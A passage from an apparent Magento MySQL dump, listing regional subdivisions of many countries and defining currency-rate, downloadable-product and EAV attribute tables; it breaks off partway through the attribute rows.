('en_US', 225, 'Haute-Loire'),
('en_US', 226, 'Loire-Atlantique'),
('en_US', 227, 'Loiret'),
('en_US', 228, 'Lot'),
('en_US', 229, 'Lot-et-Garonne'),
('en_US', 230, 'Lozère'),
('en_US', 231, 'Maine-et-Loire'),
('en_US', 232, 'Manche'),
('en_US', 233, 'Marne'),
('en_US', 234, 'Haute-Marne'),
('en_US', 235, 'Mayenne'),
('en_US', 236, 'Meurthe-et-Moselle'),
('en_US', 237, 'Meuse'),
('en_US', 238, 'Morbihan'),
('en_US', 239, 'Moselle'),
('en_US', 240, 'Nièvre'),
('en_US', 241, 'Nord'),
('en_US', 242, 'Oise'),
('en_US', 243, 'Orne'),
('en_US', 244, 'Pas-de-Calais'),
('en_US', 245, 'Puy-de-Dôme'),
('en_US', 246, 'Pyrénées-Atlantiques'),
('en_US', 247, 'Hautes-Pyrénées'),
('en_US', 248, 'Pyrénées-Orientales'),
('en_US', 249, 'Bas-Rhin'),
('en_US', 250, 'Haut-Rhin'),
('en_US', 251, 'Rhône'),
('en_US', 252, 'Haute-Saône'),
('en_US', 253, 'Saône-et-Loire'),
('en_US', 254, 'Sarthe'),
('en_US', 255, 'Savoie'),
('en_US', 256, 'Haute-Savoie'),
('en_US', 257, 'Paris'),
('en_US', 258, 'Seine-Maritime'),
('en_US', 259, 'Seine-et-Marne'),
('en_US', 260, 'Yvelines'),
('en_US', 261, 'Deux-Sèvres'),
('en_US', 262, 'Somme'),
('en_US', 263, 'Tarn'),
('en_US', 264, 'Tarn-et-Garonne'),
('en_US', 265, 'Var'),
('en_US', 266, 'Vaucluse'),
('en_US', 267, 'Vendée'),
('en_US', 268, 'Vienne'),
('en_US', 269, 'Haute-Vienne'),
('en_US', 270, 'Vosges'),
('en_US', 271, 'Yonne'),
('en_US', 272, 'Territoire-de-Belfort'),
('en_US', 273, 'Essonne'),
('en_US', 274, 'Hauts-de-Seine'),
('en_US', 275, 'Seine-Saint-Denis'),
('en_US', 276, 'Val-de-Marne'),
('en_US', 277, 'Val-d\'Oise'),
('en_US', 278, 'Alba'),
('en_US', 279, 'Arad'),
('en_US', 280, 'Argeş'),
('en_US', 281, 'Bacău'),
('en_US', 282, 'Bihor'),
('en_US', 283, 'Bistriţa-Năsăud'),
('en_US', 284, 'Botoşani'),
('en_US', 285, 'Braşov'),
('en_US', 286, 'Brăila'),
('en_US', 287, 'Bucureşti'),
('en_US', 288, 'Buzău'),
('en_US', 289, 'Caraş-Severin'),
('en_US', 290, 'Călăraşi'),
('en_US', 291, 'Cluj'),
('en_US', 292, 'Constanţa'),
('en_US', 293, 'Covasna'),
('en_US', 294, 'Dâmboviţa'),
('en_US', 295, 'Dolj'),
('en_US', 296, 'Galaţi'),
('en_US', 297, 'Giurgiu'),
('en_US', 298, 'Gorj'),
('en_US', 299, 'Harghita'),
('en_US', 300, 'Hunedoara'),
('en_US', 301, 'Ialomiţa'),
('en_US', 302, 'Iaşi'),
('en_US', 303, 'Ilfov'),
('en_US', 304, 'Maramureş'),
('en_US', 305, 'Mehedinţi'),
('en_US', 306, 'Mureş'),
('en_US', 307, 'Neamţ'),
('en_US', 308, 'Olt'),
('en_US', 309, 'Prahova'),
('en_US', 310, 'Satu-Mare'),
('en_US', 311, 'Sălaj'),
('en_US', 312, 'Sibiu'),
('en_US', 313, 'Suceava'),
('en_US', 314, 'Teleorman'),
('en_US', 315, 'Timiş'),
('en_US', 316, 'Tulcea'),
('en_US', 317, 'Vaslui'),
('en_US', 318, 'Vâlcea'),
('en_US', 319, 'Vrancea'),
('en_US', 320, 'Lappi'),
('en_US', 321, 'Pohjois-Pohjanmaa'),
('en_US', 322, 'Kainuu'),
('en_US', 323, 'Pohjois-Karjala'),
('en_US', 324, 'Pohjois-Savo'),
('en_US', 325, 'Etelä-Savo'),
('en_US', 326, 'Etelä-Pohjanmaa'),
('en_US', 327, 'Pohjanmaa'),
('en_US', 328, 'Pirkanmaa'),
('en_US', 329, 'Satakunta'),
('en_US', 330, 'Keski-Pohjanmaa'),
('en_US', 331, 'Keski-Suomi'),
('en_US', 332, 'Varsinais-Suomi'),
('en_US', 333, 'Etelä-Karjala'),
('en_US', 334, 'Päijät-Häme'),
('en_US', 335, 'Kanta-Häme'),
('en_US', 336, 'Uusimaa'),
('en_US', 337, 'Itä-Uusimaa'),
('en_US', 338, 'Kymenlaakso'),
('en_US', 339, 'Ahvenanmaa'),
('en_US', 340, 'Harjumaa'),
('en_US', 341, 'Hiiumaa'),
('en_US', 342, 'Ida-Virumaa'),
('en_US', 343, 'Jõgevamaa'),
('en_US', 344, 'Järvamaa'),
('en_US', 345, 'Läänemaa'),
('en_US', 346, 'Lääne-Virumaa'),
('en_US', 347, 'Põlvamaa'),
('en_US', 348, 'Pärnumaa'),
('en_US', 349, 'Raplamaa'),
('en_US', 350, 'Saaremaa'),
('en_US', 351, 'Tartumaa'),
('en_US', 352, 'Valgamaa'),
('en_US', 353, 'Viljandimaa'),
('en_US', 354, 'Võrumaa'),
('en_US', 355, 'Daugavpils'),
('en_US', 356, 'Jelgava'),
('en_US', 357, 'Jēkabpils'),
('en_US', 358, 'Jūrmala'),
('en_US', 359, 'Liepāja'),
('en_US', 360, 'Liepājas novads'),
('en_US', 361, 'Rēzekne'),
('en_US', 362, 'Rīga'),
('en_US', 363, 'Rīgas novads'),
('en_US', 364, 'Valmiera'),
('en_US', 365, 'Ventspils'),
('en_US', 366, 'Aglonas novads'),
('en_US', 367, 'Aizkraukles novads'),
('en_US', 368, 'Aizputes novads'),
('en_US', 369, 'Aknīstes novads'),
('en_US', 370, 'Alojas novads'),
('en_US', 371, 'Alsungas novads'),
('en_US', 372, 'Alūksnes novads'),
('en_US', 373, 'Amatas novads'),
('en_US', 374, 'Apes novads'),
('en_US', 375, 'Auces novads'),
('en_US', 376, 'Babītes novads'),
('en_US', 377, 'Baldones novads'),
('en_US', 378, 'Baltinavas novads'),
('en_US', 379, 'Balvu novads'),
('en_US', 380, 'Bauskas novads'),
('en_US', 381, 'Beverīnas novads'),
('en_US', 382, 'Brocēnu novads'),
('en_US', 383, 'Burtnieku novads'),
('en_US', 384, 'Carnikavas novads'),
('en_US', 385, 'Cesvaines novads'),
('en_US', 386, 'Ciblas novads'),
('en_US', 387, 'Cēsu novads'),
('en_US', 388, 'Dagdas novads'),
('en_US', 389, 'Daugavpils novads'),
('en_US', 390, 'Dobeles novads'),
('en_US', 391, 'Dundagas novads'),
('en_US', 392, 'Durbes novads'),
('en_US', 393, 'Engures novads'),
('en_US', 394, 'Garkalnes novads'),
('en_US', 395, 'Grobiņas novads'),
('en_US', 396, 'Gulbenes novads'),
('en_US', 397, 'Iecavas novads'),
('en_US', 398, 'Ikšķiles novads'),
('en_US', 399, 'Ilūkstes novads'),
('en_US', 400, 'Inčukalna novads'),
('en_US', 401, 'Jaunjelgavas novads'),
('en_US', 402, 'Jaunpiebalgas novads'),
('en_US', 403, 'Jaunpils novads'),
('en_US', 404, 'Jelgavas novads'),
('en_US', 405, 'Jēkabpils novads'),
('en_US', 406, 'Kandavas novads'),
('en_US', 407, 'Kokneses novads'),
('en_US', 408, 'Krimuldas novads'),
('en_US', 409, 'Krustpils novads'),
('en_US', 410, 'Krāslavas novads'),
('en_US', 411, 'Kuldīgas novads'),
('en_US', 412, 'Kārsavas novads'),
('en_US', 413, 'Lielvārdes novads'),
('en_US', 414, 'Limbažu novads'),
('en_US', 415, 'Lubānas novads'),
('en_US', 416, 'Ludzas novads'),
('en_US', 417, 'Līgatnes novads'),
('en_US', 418, 'Līvānu novads'),
('en_US', 419, 'Madonas novads'),
('en_US', 420, 'Mazsalacas novads'),
('en_US', 421, 'Mālpils novads'),
('en_US', 422, 'Mārupes novads'),
('en_US', 423, 'Naukšēnu novads'),
('en_US', 424, 'Neretas novads'),
('en_US', 425, 'Nīcas novads'),
('en_US', 426, 'Ogres novads'),
('en_US', 427, 'Olaines novads'),
('en_US', 428, 'Ozolnieku novads'),
('en_US', 429, 'Preiļu novads'),
('en_US', 430, 'Priekules novads'),
('en_US', 431, 'Priekuļu novads'),
('en_US', 432, 'Pārgaujas novads'),
('en_US', 433, 'Pāvilostas novads'),
('en_US', 434, 'Pļaviņu novads'),
('en_US', 435, 'Raunas novads'),
('en_US', 436, 'Riebiņu novads'),
('en_US', 437, 'Rojas novads'),
('en_US', 438, 'Ropažu novads'),
('en_US', 439, 'Rucavas novads'),
('en_US', 440, 'Rugāju novads'),
('en_US', 441, 'Rundāles novads'),
('en_US', 442, 'Rēzeknes novads'),
('en_US', 443, 'Rūjienas novads'),
('en_US', 444, 'Salacgrīvas novads'),
('en_US', 445, 'Salas novads'),
('en_US', 446, 'Salaspils novads'),
('en_US', 447, 'Saldus novads'),
('en_US', 448, 'Saulkrastu novads'),
('en_US', 449, 'Siguldas novads'),
('en_US', 450, 'Skrundas novads'),
('en_US', 451, 'Skrīveru novads'),
('en_US', 452, 'Smiltenes novads'),
('en_US', 453, 'Stopiņu novads'),
('en_US', 454, 'Strenču novads'),
('en_US', 455, 'Sējas novads'),
('en_US', 456, 'Talsu novads'),
('en_US', 457, 'Tukuma novads'),
('en_US', 458, 'Tērvetes novads'),
('en_US', 459, 'Vaiņodes novads'),
('en_US', 460, 'Valkas novads'),
('en_US', 461, 'Valmieras novads'),
('en_US', 462, 'Varakļānu novads'),
('en_US', 463, 'Vecpiebalgas novads'),
('en_US', 464, 'Vecumnieku novads'),
('en_US', 465, 'Ventspils novads'),
('en_US', 466, 'Viesītes novads'),
('en_US', 467, 'Viļakas novads'),
('en_US', 468, 'Viļānu novads'),
('en_US', 469, 'Vārkavas novads'),
('en_US', 470, 'Zilupes novads'),
('en_US', 471, 'Ādažu novads'),
('en_US', 472, 'Ērgļu novads'),
('en_US', 473, 'Ķeguma novads'),
('en_US', 474, 'Ķekavas novads'),
('en_US', 475, 'Alytaus Apskritis'),
('en_US', 476, 'Kauno Apskritis'),
('en_US', 477, 'Klaipėdos Apskritis'),
('en_US', 478, 'Marijampolės Apskritis'),
('en_US', 479, 'Panevėžio Apskritis'),
('en_US', 480, 'Šiaulių Apskritis'),
('en_US', 481, 'Tauragės Apskritis'),
('en_US', 482, 'Telšių Apskritis'),
('en_US', 483, 'Utenos Apskritis'),
('en_US', 484, 'Vilniaus Apskritis'),
('en_US', 485, 'Acre'),
('en_US', 486, 'Alagoas'),
('en_US', 487, 'Amapá'),
('en_US', 488, 'Amazonas'),
('en_US', 489, 'Bahia'),
('en_US', 490, 'Ceará'),
('en_US', 491, 'Espírito Santo'),
('en_US', 492, 'Goiás'),
('en_US', 493, 'Maranhão'),
('en_US', 494, 'Mato Grosso'),
('en_US', 495, 'Mato Grosso do Sul'),
('en_US', 496, 'Minas Gerais'),
('en_US', 497, 'Pará'),
('en_US', 498, 'Paraíba'),
('en_US', 499, 'Paraná'),
('en_US', 500, 'Pernambuco'),
('en_US', 501, 'Piauí'),
('en_US', 502, 'Rio de Janeiro'),
('en_US', 503, 'Rio Grande do Norte'),
('en_US', 504, 'Rio Grande do Sul'),
('en_US', 505, 'Rondônia'),
('en_US', 506, 'Roraima'),
('en_US', 507, 'Santa Catarina'),
('en_US', 508, 'São Paulo'),
('en_US', 509, 'Sergipe'),
('en_US', 510, 'Tocantins'),
('en_US', 511, 'Distrito Federal'),
('en_US', 512, 'Zagrebačka županija'),
('en_US', 513, 'Krapinsko-zagorska županija'),
('en_US', 514, 'Sisačko-moslavačka županija'),
('en_US', 515, 'Karlovačka županija'),
('en_US', 516, 'Varaždinska županija'),
('en_US', 517, 'Koprivničko-križevačka županija'),
('en_US', 518, 'Bjelovarsko-bilogorska županija'),
('en_US', 519, 'Primorsko-goranska županija'),
('en_US', 520, 'Ličko-senjska županija'),
('en_US', 521, 'Virovitičko-podravska županija'),
('en_US', 522, 'Požeško-slavonska županija'),
('en_US', 523, 'Brodsko-posavska županija'),
('en_US', 524, 'Zadarska županija'),
('en_US', 525, 'Osječko-baranjska županija'),
('en_US', 526, 'Šibensko-kninska županija'),
('en_US', 527, 'Vukovarsko-srijemska županija'),
('en_US', 528, 'Splitsko-dalmatinska županija'),
('en_US', 529, 'Istarska županija'),
('en_US', 530, 'Dubrovačko-neretvanska županija'),
('en_US', 531, 'Međimurska županija'),
('en_US', 532, 'Grad Zagreb'),
('en_US', 533, 'Andaman and Nicobar Islands'),
('en_US', 534, 'Andhra Pradesh'),
('en_US', 535, 'Arunachal Pradesh'),
('en_US', 536, 'Assam'),
('en_US', 537, 'Bihar'),
('en_US', 538, 'Chandigarh'),
('en_US', 539, 'Chhattisgarh'),
('en_US', 540, 'Dadra and Nagar Haveli'),
('en_US', 541, 'Daman and Diu'),
('en_US', 542, 'Delhi'),
('en_US', 543, 'Goa'),
('en_US', 544, 'Gujarat'),
('en_US', 545, 'Haryana'),
('en_US', 546, 'Himachal Pradesh'),
('en_US', 547, 'Jammu and Kashmir'),
('en_US', 548, 'Jharkhand'),
('en_US', 549, 'Karnataka'),
('en_US', 550, 'Kerala'),
('en_US', 551, 'Lakshadweep'),
('en_US', 552, 'Madhya Pradesh'),
('en_US', 553, 'Maharashtra'),
('en_US', 554, 'Manipur'),
('en_US', 555, 'Meghalaya'),
('en_US', 556, 'Mizoram'),
('en_US', 557, 'Nagaland'),
('en_US', 558, 'Odisha'),
('en_US', 559, 'Puducherry'),
('en_US', 560, 'Punjab'),
('en_US', 561, 'Rajasthan'),
('en_US', 562, 'Sikkim'),
('en_US', 563, 'Tamil Nadu'),
('en_US', 564, 'Telangana'),
('en_US', 565, 'Tripura'),
('en_US', 566, 'Uttar Pradesh'),
('en_US', 567, 'Uttarakhand'),
('en_US', 568, 'West Bengal'),
('en_US', 569, 'Australian Capital Territory'),
('en_US', 570, 'New South Wales'),
('en_US', 571, 'Victoria'),
('en_US', 572, 'Queensland'),
('en_US', 573, 'South Australia'),
('en_US', 574, 'Tasmania'),
('en_US', 575, 'Western Australia'),
('en_US', 576, 'Northern Territory'),
('en_US', 577, 'Antwerpen'),
('en_US', 578, 'Brabant wallon'),
('en_US', 579, 'Brussels-Capital Region'),
('en_US', 580, 'Hainaut'),
('en_US', 581, 'Limburg'),
('en_US', 582, 'Liège'),
('en_US', 583, 'Luxembourg'),
('en_US', 584, 'Namur'),
('en_US', 585, 'Oost-Vlaanderen'),
('en_US', 586, 'Vlaams-Brabant'),
('en_US', 587, 'West-Vlaanderen'),
('en_US', 588, 'Anhui Sheng'),
('en_US', 589, 'Beijing Shi'),
('en_US', 590, 'Chongqing Shi'),
('en_US', 591, 'Fujian Sheng'),
('en_US', 592, 'Gansu Sheng'),
('en_US', 593, 'Guangdong Sheng'),
('en_US', 594, 'Guangxi Zhuangzu Zizhiqu'),
('en_US', 595, 'Guizhou Sheng'),
('en_US', 596, 'Hainan Sheng'),
('en_US', 597, 'Hebei Sheng'),
('en_US', 598, 'Heilongjiang Sheng'),
('en_US', 599, 'Henan Sheng'),
('en_US', 600, 'Hong Kong SAR'),
('en_US', 601, 'Hubei Sheng'),
('en_US', 602, 'Hunan Sheng'),
('en_US', 603, 'Jiangsu Sheng'),
('en_US', 604, 'Jiangxi Sheng'),
('en_US', 605, 'Jilin Sheng'),
('en_US', 606, 'Liaoning Sheng'),
('en_US', 607, 'Macao SAR'),
('en_US', 608, 'Nei Mongol Zizhiqu'),
('en_US', 609, 'Ningxia Huizi Zizhiqu'),
('en_US', 610, 'Qinghai Sheng'),
('en_US', 611, 'Shaanxi Sheng'),
('en_US', 612, 'Shandong Sheng'),
('en_US', 613, 'Shanghai Shi'),
('en_US', 614, 'Shanxi Sheng'),
('en_US', 615, 'Sichuan Sheng'),
('en_US', 616, 'Taiwan Sheng'),
('en_US', 617, 'Tianjin Shi'),
('en_US', 618, 'Xinjiang Uygur Zizhiqu'),
('en_US', 619, 'Xizang Zizhiqu'),
('en_US', 620, 'Yunnan Sheng'),
('en_US', 621, 'Zhejiang Sheng'),
('en_US', 622, 'Amazonas'),
('en_US', 623, 'Antioquia'),
('en_US', 624, 'Arauca'),
('en_US', 625, 'Atlántico'),
('en_US', 626, 'Bolívar'),
('en_US', 627, 'Boyacá'),
('en_US', 628, 'Caldas'),
('en_US', 629, 'Caquetá'),
('en_US', 630, 'Casanare'),
('en_US', 631, 'Cauca'),
('en_US', 632, 'Cesar'),
('en_US', 633, 'Chocó'),
('en_US', 634, 'Córdoba'),
('en_US', 635, 'Cundinamarca'),
('en_US', 636, 'Guainía'),
('en_US', 637, 'Guaviare'),
('en_US', 638, 'Huila'),
('en_US', 639, 'La Guajira'),
('en_US', 640, 'Magdalena'),
('en_US', 641, 'Meta'),
('en_US', 642, 'Nariño'),
('en_US', 643, 'Norte de Santander'),
('en_US', 644, 'Putumayo'),
('en_US', 645, 'Quindío'),
('en_US', 646, 'Risaralda'),
('en_US', 647, 'San Andrés y Providencia'),
('en_US', 648, 'Santander'),
('en_US', 649, 'Sucre'),
('en_US', 650, 'Tolima'),
('en_US', 651, 'Valle del Cauca'),
('en_US', 652, 'Vaupés'),
('en_US', 653, 'Vichada'),
('en_US', 654, 'Aguascalientes'),
('en_US', 655, 'Baja California'),
('en_US', 656, 'Baja California Sur'),
('en_US', 657, 'Campeche'),
('en_US', 658, 'Chiapas'),
('en_US', 659, 'Chihuahua'),
('en_US', 660, 'Ciudad de México'),
('en_US', 661, 'Coahuila'),
('en_US', 662, 'Colima'),
('en_US', 663, 'Durango'),
('en_US', 664, 'Estado de México'),
('en_US', 665, 'Guanajuato'),
('en_US', 666, 'Guerrero'),
('en_US', 667, 'Hidalgo'),
('en_US', 668, 'Jalisco'),
('en_US', 669, 'Michoacán'),
('en_US', 670, 'Morelos'),
('en_US', 671, 'Nayarit'),
('en_US', 672, 'Nuevo León'),
('en_US', 673, 'Oaxaca'),
('en_US', 674, 'Puebla'),
('en_US', 675, 'Querétaro'),
('en_US', 676, 'Quintana Roo'),
('en_US', 677, 'San Luis Potosí'),
('en_US', 678, 'Sinaloa'),
('en_US', 679, 'Sonora'),
('en_US', 680, 'Tabasco'),
('en_US', 681, 'Tamaulipas'),
('en_US', 682, 'Tlaxcala'),
('en_US', 683, 'Veracruz'),
('en_US', 684, 'Yucatán'),
('en_US', 685, 'Zacatecas'),
('en_US', 686, 'dolnośląskie'),
('en_US', 687, 'kujawsko-pomorskie'),
('en_US', 688, 'lubelskie'),
('en_US', 689, 'lubuskie'),
('en_US', 690, 'łódzkie'),
('en_US', 691, 'małopolskie'),
('en_US', 692, 'mazowieckie'),
('en_US', 693, 'opolskie'),
('en_US', 694, 'podkarpackie'),
('en_US', 695, 'podlaskie'),
('en_US', 696, 'pomorskie'),
('en_US', 697, 'śląskie'),
('en_US', 698, 'świętokrzyskie'),
('en_US', 699, 'warmińsko-mazurskie'),
('en_US', 700, 'wielkopolskie'),
('en_US', 701, 'zachodniopomorskie');

-- --------------------------------------------------------

--
-- Table structure for table `directory_currency_rate`
--

CREATE TABLE `directory_currency_rate` (
  `currency_from` varchar(3) NOT NULL COMMENT 'Currency Code Convert From',
  `currency_to` varchar(3) NOT NULL COMMENT 'Currency Code Convert To',
  `rate` decimal(24,12) NOT NULL DEFAULT 0.000000000000 COMMENT 'Currency Conversion Rate'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Directory Currency Rate';

--
-- Dumping data for table `directory_currency_rate`
--

INSERT INTO `directory_currency_rate` (`currency_from`, `currency_to`, `rate`) VALUES
('EUR', 'EUR', 1.000000000000),
('EUR', 'USD', 1.415000000000),
('USD', 'EUR', 0.706700000000),
('USD', 'USD', 1.000000000000);

-- --------------------------------------------------------

--
-- Table structure for table `downloadable_link`
--

CREATE TABLE `downloadable_link` (
  `link_id` int(10) UNSIGNED NOT NULL COMMENT 'Link ID',
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `sort_order` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Sort order',
  `number_of_downloads` int(11) DEFAULT NULL COMMENT 'Number of downloads',
  `is_shareable` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Shareable flag',
  `link_url` varchar(255) DEFAULT NULL COMMENT 'Link Url',
  `link_file` varchar(255) DEFAULT NULL COMMENT 'Link File',
  `link_type` varchar(20) DEFAULT NULL COMMENT 'Link Type',
  `sample_url` varchar(255) DEFAULT NULL COMMENT 'Sample Url',
  `sample_file` varchar(255) DEFAULT NULL COMMENT 'Sample File',
  `sample_type` varchar(20) DEFAULT NULL COMMENT 'Sample Type'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Downloadable Link Table';

-- --------------------------------------------------------

--
-- Table structure for table `downloadable_link_price`
--

CREATE TABLE `downloadable_link_price` (
  `price_id` int(10) UNSIGNED NOT NULL COMMENT 'Price ID',
  `link_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Link ID',
  `website_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Website ID',
  `price` decimal(20,6) NOT NULL DEFAULT 0.000000 COMMENT 'Price'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Downloadable Link Price Table';

-- --------------------------------------------------------

--
-- Table structure for table `downloadable_link_purchased`
--

CREATE TABLE `downloadable_link_purchased` (
  `purchased_id` int(10) UNSIGNED NOT NULL COMMENT 'Purchased ID',
  `order_id` int(10) UNSIGNED DEFAULT 0 COMMENT 'Order ID',
  `order_increment_id` varchar(50) DEFAULT NULL COMMENT 'Order Increment ID',
  `order_item_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Order Item ID',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Date of creation',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Date of modification',
  `customer_id` int(10) UNSIGNED DEFAULT 0 COMMENT 'Customer ID',
  `product_name` varchar(255) DEFAULT NULL COMMENT 'Product name',
  `product_sku` varchar(255) DEFAULT NULL COMMENT 'Product sku',
  `link_section_title` varchar(255) DEFAULT NULL COMMENT 'Link_section_title'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Downloadable Link Purchased Table';

-- --------------------------------------------------------

--
-- Table structure for table `downloadable_link_purchased_item`
--

CREATE TABLE `downloadable_link_purchased_item` (
  `item_id` int(10) UNSIGNED NOT NULL COMMENT 'Item ID',
  `purchased_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Purchased ID',
  `order_item_id` int(10) UNSIGNED DEFAULT 0 COMMENT 'Order Item ID',
  `product_id` int(10) UNSIGNED DEFAULT 0 COMMENT 'Product ID',
  `link_hash` varchar(255) DEFAULT NULL COMMENT 'Link hash',
  `number_of_downloads_bought` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Number of downloads bought',
  `number_of_downloads_used` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Number of downloads used',
  `link_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Link ID',
  `link_title` varchar(255) DEFAULT NULL COMMENT 'Link Title',
  `is_shareable` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Shareable Flag',
  `link_url` varchar(255) DEFAULT NULL COMMENT 'Link Url',
  `link_file` varchar(255) DEFAULT NULL COMMENT 'Link File',
  `link_type` varchar(255) DEFAULT NULL COMMENT 'Link Type',
  `status` varchar(50) DEFAULT NULL COMMENT 'Status',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Creation Time',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Update Time'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Downloadable Link Purchased Item Table';

-- --------------------------------------------------------

--
-- Table structure for table `downloadable_link_title`
--

CREATE TABLE `downloadable_link_title` (
  `title_id` int(10) UNSIGNED NOT NULL COMMENT 'Title ID',
  `link_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Link ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `title` varchar(255) DEFAULT NULL COMMENT 'Title'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Link Title Table';

-- --------------------------------------------------------

--
-- Table structure for table `downloadable_sample`
--

CREATE TABLE `downloadable_sample` (
  `sample_id` int(10) UNSIGNED NOT NULL COMMENT 'Sample ID',
  `product_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Product ID',
  `sample_url` varchar(255) DEFAULT NULL COMMENT 'Sample URL',
  `sample_file` varchar(255) DEFAULT NULL COMMENT 'Sample file',
  `sample_type` varchar(20) DEFAULT NULL COMMENT 'Sample Type',
  `sort_order` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Sort Order'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Downloadable Sample Table';

-- --------------------------------------------------------

--
-- Table structure for table `downloadable_sample_title`
--

CREATE TABLE `downloadable_sample_title` (
  `title_id` int(10) UNSIGNED NOT NULL COMMENT 'Title ID',
  `sample_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Sample ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `title` varchar(255) DEFAULT NULL COMMENT 'Title'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Downloadable Sample Title Table';

-- --------------------------------------------------------

--
-- Table structure for table `eav_attribute`
--

CREATE TABLE `eav_attribute` (
  `attribute_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Attribute ID',
  `entity_type_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity Type ID',
  `attribute_code` varchar(255) NOT NULL COMMENT 'Attribute Code',
  `attribute_model` varchar(255) DEFAULT NULL COMMENT 'Attribute Model',
  `backend_model` varchar(255) DEFAULT NULL COMMENT 'Backend Model',
  `backend_type` varchar(8) NOT NULL DEFAULT 'static' COMMENT 'Backend Type',
  `backend_table` varchar(255) DEFAULT NULL COMMENT 'Backend Table',
  `frontend_model` varchar(255) DEFAULT NULL COMMENT 'Frontend Model',
  `frontend_input` varchar(50) DEFAULT NULL COMMENT 'Frontend Input',
  `frontend_label` varchar(255) DEFAULT NULL COMMENT 'Frontend Label',
  `frontend_class` varchar(255) DEFAULT NULL COMMENT 'Frontend Class',
  `source_model` varchar(255) DEFAULT NULL COMMENT 'Source Model',
  `is_required` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Defines Is Required',
  `is_user_defined` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Defines Is User Defined',
  `default_value` text DEFAULT NULL COMMENT 'Default Value',
  `is_unique` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Defines Is Unique',
  `note` varchar(255) DEFAULT NULL COMMENT 'Note'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Attribute';

--
-- Dumping data for table `eav_attribute`
--

INSERT INTO `eav_attribute` (`attribute_id`, `entity_type_id`, `attribute_code`, `attribute_model`, `backend_model`, `backend_type`, `backend_table`, `frontend_model`, `frontend_input`, `frontend_label`, `frontend_class`, `source_model`, `is_required`, `is_user_defined`, `default_value`, `is_unique`, `note`) VALUES
(1, 1, 'website_id', NULL, 'Magento\\Customer\\Model\\Customer\\Attribute\\Backend\\Website', 'static', NULL, NULL, 'select', 'Associate to Website', NULL, 'Magento\\Customer\\Model\\Customer\\Attribute\\Source\\Website', 1, 0, NULL, 0, NULL),
(2, 1, 'store_id', NULL, 'Magento\\Customer\\Model\\Customer\\Attribute\\Backend\\Store', 'static', NULL, NULL, 'select', 'Create In', NULL, 'Magento\\Customer\\Model\\Customer\\Attribute\\Source\\Store', 1, 0, NULL, 0, NULL),
(3, 1, 'created_in', NULL, NULL, 'static', NULL, NULL, 'text', 'Created From', NULL, NULL, 0, 0, NULL, 0, NULL),
(4, 1, 'prefix', NULL, NULL, 'static', NULL, NULL, 'text', 'Name Prefix', NULL, NULL, 0, 0, NULL, 0, NULL),
(5, 1, 'firstname', NULL, NULL, 'static', NULL, NULL, 'text', 'First Name', NULL, NULL, 1, 0, NULL, 0, NULL),
(6, 1, 'middlename', NULL, NULL, 'static', NULL, NULL, 'text', 'Middle Name/Initial', NULL, NULL, 0, 0, NULL, 0, NULL),
(7, 1, 'lastname', NULL, NULL, 'static', NULL, NULL, 'text', 'Last Name', NULL, NULL, 1, 0, NULL, 0, NULL),
(8, 1, 'suffix', NULL, NULL, 'static', NULL, NULL, 'text', 'Name Suffix', NULL, NULL, 0, 0, NULL, 0, NULL),
(9, 1, 'email', NULL, NULL, 'static', NULL, NULL, 'text', 'Email', NULL, NULL, 1, 0, NULL, 0, NULL),
(10, 1, 'group_id', NULL, NULL, 'static', NULL, NULL, 'select', 'Group', NULL, 'Magento\\Customer\\Model\\Customer\\Attribute\\Source\\Group', 1, 0, NULL, 0, NULL),
(11, 1, 'dob', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Backend\\Datetime', 'static', NULL, 'Magento\\Eav\\Model\\Entity\\Attribute\\Frontend\\Datetime', 'date', 'Date of Birth', NULL, NULL, 0, 0, NULL, 0, NULL),
(12, 1, 'password_hash', NULL, 'Magento\\Customer\\Model\\Customer\\Attribute\\Backend\\Password', 'static', NULL, NULL, 'hidden', NULL, NULL, NULL, 0, 0, NULL, 0, NULL),
(13, 1, 'rp_token', NULL, NULL, 'static', NULL, NULL, 'hidden', NULL, NULL, NULL, 0, 0, NULL, 0, NULL),
(14, 1, 'rp_token_created_at', NULL, NULL, 'static', NULL, NULL, 'date', NULL, NULL, NULL, 0, 0, NULL, 0, NULL),
